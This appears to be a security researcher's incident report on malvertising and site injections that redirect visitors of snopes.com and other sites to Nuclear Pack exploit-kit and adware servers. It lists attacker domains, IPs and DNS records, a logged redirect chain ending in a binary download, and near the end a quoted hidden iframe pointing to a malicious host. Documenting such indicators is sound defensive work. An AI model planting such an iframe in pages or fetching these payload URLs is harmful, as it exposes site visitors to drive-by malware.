Abuse of ad networks to drive traffic to malware distribution servers is an established and commonplace attack tactic. We recently observed activity involving multiple popular websites where traffic from malicious ads and infected sites passed through a set of traffic distribution systems directing visitors to Nuclear Pack exploit kit and other malware distribution servers.

We began to see this activity on November 6 and can confirm redirections through today.

www.snopes.com

Earlier in the week, urban legends website www.snopes.com was tracked publishing ads leading to the website clicknewa.com (8.36.46.223). This site functions as a rotator, sending traffic further to a set of websites including the following:

  • cdn17-jquery.com
  • jquery-cdn14.com
  • cdn12-bootstrap.com

Hosting IPs:

clicknewa.com           8.36.46.223
cdn17-jquery.com        5.61.36.2

5.61.36.2 AS16265 | NL | ripencc | 2001-02-12 | LEASEWEB-NETWORK LeaseWeb B.V.
8.36.46.223 AS30152 | US | arin | 2011-02-22 | BEYOND-HOSTING - Beyond Hosting, LLC

Related records:

cdn17-jquery.com.       IN  A  5.61.36.2
jquery-cdn14.com.       IN  A  5.61.36.2
cdn12-bootstrap.com.    IN  A  5.61.36.2
mobile-top-review.com.  IN  A  5.61.36.2

The origin of this traffic redirection on Snopes' site is through the ValueClick/Conversant ad network.

Snopes site visitors have faced impact from malicious ads distributing malware on more than one occasion. As recently as October, viewing content on www.snopes.com was found to result in redirection to Angler exploit kit, passing through a number of systems directing traffic resulting from display ads on the site.

The tactic of naming malicious sites after various frontend web toolkit brands is not new; it enables attackers to pass casual inspection by some users, and we have seen the behavior before. One resounding example of the tactic is the use of a fake jQuery CDN site to host a malicious redirector during the compromise of the jQuery project's sites earlier in the year.

More recent activity has also been observed with traffic directed from clicknewa.com to clickated.com, as observed here. clickated.com has a history of malicious traffic redirection, as shown in this incident from September where the site passed traffic to RIG exploit kit.

clickated.com           209.87.144.91

209.87.144.91 AS30152 | US | arin | 2011-02-22 | BEYOND-HOSTING - Beyond Hosting, LLC

Adware distribution

Other occurrences of requests to TDS domain clicknewa.com is seen to redirect to additional malware distribution campaigns, including recent adware loaders observed with high frequency lately.

http://clicknewa.com/view/qVpx2PvLu3l4B4IsiZQ5xsULpCznDnZhSalSMdKoN94YGWIY00?c=2379&pid=40&tid=
    302 text/html [no content]
http://www.yousoftjultimatedwn.com/wd9z1WG9/videoupdater/c/?ref=clicknewa.com&pid=40&tid=
    302 text/html 154B
http://www.08i8b4384.com/3659203E65716B5B28323E29277D28441FC2A816B4664BDA609DC660A058618A85AFD70BC4BF103CCC7D79F5A1B8EDCB?ref=clicknewa.com&tid=&slp=www.yousoftjultimatedwn.com&pid=40
    200 text/html 10.95kB
...
http://ttb.08i8b4384.com/download/request/545a00665f1c1e4737000006/wd9z1WG9?__tc=1415864973.938&lpsl=2cd430f7b18059ac136b570796d7bad0&expire=1415951370&ref=clicknewa.com&tid=&slp=www.yousoftjultimatedwn.com&pid=40&fileName=Setup_v2_1
    302 text/html [no content]
http://xddlhqyol.bo0v3029w.com/Jn0XULFcdO1P_hE1cQJ8Vky3XbDXBC_VBnCsD07uFlZsSJw2rAteimpKXlBtkRPmLAPTkJc8_5YH0Hv0IYUOLlZUqhUM-IpmIKoUYIy0KcddUQhd7_8du9HyLMvGpl0m
    200 application/octet-stream 732.86kB

Direct injection

Other sites show redirections to the same malicious infrastructure triggered not by malicious ad placement but by direct web content injection. As shown in this incident, popular (Alexa top 10K) online game arcade site myonlinearcade.com is serving a malicious iframe injected into their site footer. This injection has been in place since at least November 7th.

On November 9th, we detected Nepalese news portal www.ekantipur.com serving malicious iframes as well:

https://sf.riskiq.net/bl/82574586/cd46d3d01a619e40?_sg=DYadsw%2F2hZyqTZyRVuhxwg%3D%3D

Similar malicious iframes were injected into their site content at the time of detection:

<iframe src="http://cdn17-jquery.com/ekantipur" style="width:100px;height:100px;position:absolute;left:-10000px;top:0;" width="100px" height="100px"/>